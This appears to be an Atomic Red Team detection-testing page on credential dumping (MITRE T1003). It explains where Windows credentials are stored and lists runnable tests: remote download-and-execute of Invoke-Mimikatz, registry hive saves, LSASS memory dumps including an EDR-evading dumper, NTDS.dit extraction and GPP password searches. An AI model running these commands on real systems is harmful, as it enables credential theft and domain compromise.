Skip to content

Latest commit

 

History

History
997 lines (614 loc) · 33.4 KB

T1003.md

File metadata and controls

997 lines (614 loc) · 33.4 KB

T1003 - Credential Dumping

Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.

Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

Windows

SAM (Security Accounts Manager)

The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.   A number of tools can be used to retrieve the SAM file through in-memory techniques:

Alternatively, the SAM can be extracted from the Registry with Reg:

  • reg save HKLM\sam sam
  • reg save HKLM\system system

Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)

Notes: Rid 500 account is the local, in-built administrator. Rid 501 is the guest account. User accounts start with a RID of 1,000+.

Cached Credentials

The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.   A number of tools can be used to retrieve the SAM file through in-memory techniques.

Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.

Notes: Cached credentials for Windows Vista are derived using PBKDF2.

Local Security Authority (LSA) Secrets

With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.   When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.   A number of tools can be used to retrieve the SAM file through in-memory techniques.

Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.

Notes: The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. Windows 10 adds protections for LSA Secrets described in Mitigation.

NTDS from Domain Controller

Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)

The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.

  • Volume Shadow Copy
  • secretsdump.py
  • Using the in-built Windows tool, ntdsutil.exe
  • Invoke-NinjaCopy

Group Policy Preference (GPP) Files

Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.

These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)

The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:

  • Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"
  • Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
  • gpprefdecrypt.py

Notes: On the SYSVOL share, the following can be used to enumerate potential XML files. dir /s * .xml

Service Principal Names (SPNs)

See Kerberoasting.

Plaintext Credentials

After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.

SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.

The following SSPs can be used to access credentials:

Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection) Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)   The following tools can be used to enumerate credentials:

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

  • procdump -ma lsass.exe lsass_dump

Locally, mimikatz can be run:

  • sekurlsa::Minidump lsassdump.dmp
  • sekurlsa::logonPasswords

DCSync

DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in Account Manipulation. (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)

Linux

Proc filesystem

The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the MimiPenguin, an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.

Atomic Tests


Atomic Test #1 - Powershell Mimikatz

Dumps credentials from memory via Powershell by invoking a remote mimikatz script.

If Mimikatz runs successfully you will see several usernames and hashes output to the screen.

Common failures include seeing an "access denied" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
remote_script URL to a remote Mimikatz script that dumps credentials Url https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds


Atomic Test #2 - Gsecdump

Dump credentials from memory using Gsecdump.

Upon successful execution, you should see domain\username's following by two 32 characters hashes.

If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. You will receive only error output if you do not run this test from an elevated context (run as administrator)

If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
gsecdump_exe Path to the Gsecdump executable Path PathToAtomicsFolder\T1003\bin\gsecdump.exe
gsecdump_url Path to download Gsecdump binary file url https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
gsecdump_bin_hash File hash of the Gsecdump binary file String 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

#{gsecdump_exe} -a

Dependencies: Run with powershell!

Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
Check Prereq Commands:
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} 
Get Prereq Commands:
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
  Move-Item $binpath "#{gsecdump_exe}"
}


Atomic Test #3 - Windows Credential Editor

Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)

Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.

If you see no output it is likely that execution was blocked by Anti-Virus.

If you see a message saying "wce.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install Windows Credential Editor first.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
output_file Path where resulting data should be placed Path %temp%\wce-output.txt
wce_exe Path of Windows Credential Editor executable Path PathToAtomicsFolder\T1003\bin\wce.exe
wce_url Path to download Windows Credential Editor zip file url https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
wce_zip_hash File hash of the Windows Credential Editor zip file String 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

#{wce_exe} -o #{output_file}

Cleanup Commands:

del "#{output_file}" >nul 2>&1

Dependencies: Run with powershell!

Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
Check Prereq Commands:
if (Test-Path #{wce_exe}) {exit 0} else {exit 1} 
Get Prereq Commands:
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
  Expand-Archive $zippath $parentpath\wce -Force
  Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
  Remove-Item $zippath, $parentpath\wce -Recurse
}


Atomic Test #4 - Registry dump of SAM, creds, and secrets

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

Cleanup Commands:

del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul


Atomic Test #5 - Dump LSASS.exe Memory using ProcDump

The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump.

Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.

If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
output_file Path where resulting dump should be placed Path C:\Windows\Temp\lsass_dump.dmp
procdump_exe Path of Procdump executable Path PathToAtomicsFolder\T1003\bin\procdump.exe

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

#{procdump_exe} -accepteula -ma lsass.exe #{output_file}

Cleanup Commands:

del "#{output_file}" >nul 2> nul

Dependencies: Run with powershell!

Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
Check Prereq Commands:
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} 
Get Prereq Commands:
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force


Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll

The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.

Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full

Cleanup Commands:

Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore


Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking

The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\windows\temp\dumpert.dmp.

If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
dumpert_exe Path of Dumpert executable Path PathToAtomicsFolder\T1003\bin\Outflank-Dumpert.exe

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

#{dumpert_exe}

Cleanup Commands:

del C:\windows\temp\dumpert.dmp >nul 2> nul

Dependencies: Run with powershell!

Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
Check Prereq Commands:
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} 
Get Prereq Commands:
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}


Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager

The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions.

Supported Platforms: Windows

Run it with these steps!

  1. Open Task Manager: On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking on the task bar and selecting "Task Manager".

  2. Select lsass.exe: If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe and select it for manipulation.

  3. Dump lsass.exe memory: Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.



Atomic Test #9 - Offline Credential Theft With Mimikatz

The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
mimikatz_exe Path of the Mimikatz binary string PathToAtomicsFolder\T1003\bin\mimikatz.exe
input_file Path of the Lsass dump Path %tmp%\lsass.DMP

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit

Dependencies: Run with powershell!

Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
Check Prereq Commands:
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} 
Get Prereq Commands:
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
Description: Lsass dump must exist at specified location (#{input_file})
Check Prereq Commands:
cmd /c "if not exist #{input_file} (exit /b 1)" 
Get Prereq Commands:
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"


Atomic Test #10 - Dump Active Directory Database with NTDSUtil

This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication.

Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
output_folder Path where resulting dump should be placed Path C:\Windows\Temp

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q

Dependencies: Run with command_prompt!

Description: Target must be a Domain Controller
Check Prereq Commands:
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
Get Prereq Commands:
echo Sorry, Promoting this machine to a Domain Controller must be done manually


Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit

This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
drive_letter Drive letter to source VSC (including colon) String C:

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

vssadmin.exe create shadow /for=#{drive_letter}

Dependencies: Run with command_prompt!

Description: Target must be a Domain Controller
Check Prereq Commands:
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
Get Prereq Commands:
echo Sorry, Promoting this machine to a Domain Controller must be done manually


Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy

This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
vsc_name Name of Volume Shadow Copy String \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
extract_path Path for extracted NTDS.dit Path C:\Windows\Temp

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE

Cleanup Commands:

del "#{extract_path}\ntds.dit"        >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE"     >nul 2> nul

Dependencies: Run with command_prompt!

Description: Target must be a Domain Controller
Check Prereq Commands:
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
Get Prereq Commands:
echo Sorry, Promoting this machine to a Domain Controller must be done manually
Description: Volume shadow copy must exist
Check Prereq Commands:
if not exist #{vsc_name} (exit /b 1) 
Get Prereq Commands:
echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement
Description: Extract path must exist
Check Prereq Commands:
if not exist #{extract_path} (exit /b 1) 
Get Prereq Commands:
mkdir #{extract_path}


Atomic Test #13 - GPP Passwords (findstr)

Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

findstr /S cpassword %logonserver%\sysvol\*.xml

Dependencies: Run with powershell!

Description: Computer must be domain joined
Check Prereq Commands:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} 
Get Prereq Commands:
Write-Host Joining this computer to a domain must be done manually


Atomic Test #14 - GPP Passwords (Get-GPPPassword)

Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This test is intended to be run from a domain joined workstation, not on the Domain Controller itself. The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands.

Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found".

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
gpp_script_path Path to the Get-GPPPassword PowerShell Script Path PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
gpp_script_url URL of the Get-GPPPassword PowerShell Script url https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1

Attack Commands: Run with powershell!

. #{gpp_script_path}
Get-GPPPassword -Verbose

Dependencies: Run with powershell!

Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
Check Prereq Commands:
if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } 
Get Prereq Commands:
New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
Description: Computer must be domain joined
Check Prereq Commands:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} 
Get Prereq Commands:
Write-Host Joining this computer to a domain must be done manually


Atomic Test #15 - LSASS read with pypykatz

Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::

Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

Successful execution of this test will display multiple useranames and passwords/hashes to the screen.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

pypykatz live lsa

Dependencies: Run with powershell!

Description: Computer must have python 3 installed
Check Prereq Commands:
if (python --version) {exit 0} else {exit 1} 
Get Prereq Commands:
echo "Python 3 must be installed manually"
Description: Computer must have pip installed
Check Prereq Commands:
if (pip3 -V) {exit 0} else {exit 1} 
Get Prereq Commands:
echo "PIP must be installed manually"
Description: pypykatz must be installed and part of PATH
Check Prereq Commands:
if (cmd /c pypykatz -h) {exit 0} else {exit 1} 
Get Prereq Commands:
pip3 install pypykatz


Atomic Test #16 - Registry parse with pypykatz

Parses registry hives to obtain stored credentials

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

pypykatz live registry

Dependencies: Run with powershell!

Description: Computer must have python 3 installed
Check Prereq Commands:
if (python --version) {exit 0} else {exit 1} 
Get Prereq Commands:
echo "Python 3 must be installed manually"
Description: Computer must have pip installed
Check Prereq Commands:
if (pip3 -V) {exit 0} else {exit 1} 
Get Prereq Commands:
echo "PIP must be installed manually"
Description: pypykatz must be installed and part of PATH
Check Prereq Commands:
if (cmd /c pypykatz -h) {exit 0} else {exit 1} 
Get Prereq Commands:
pip3 install pypykatz


Atomic Test #17 - Run Chrome-password Collector

A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.

Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb.

Adapted from MITRE ATTACK Evals

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
file_path File path for modified Sysinternals String $env:TEMP

Attack Commands: Run with powershell!

Set-Location -path "#{file_path}\Sysinternals";
./accesschk.exe -accepteula .;

Cleanup Commands:

Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Modified Sysinternals must be located at #{file_path}
Check Prereq Commands:
if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} 
Get Prereq Commands:
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
Expand-Archive #{file_path}\Modified-SysInternalsSuite.zip #{file_path}\sysinternals -Force
Remove-Item #{file_path}\Modified-SysInternalsSuite.zip -Force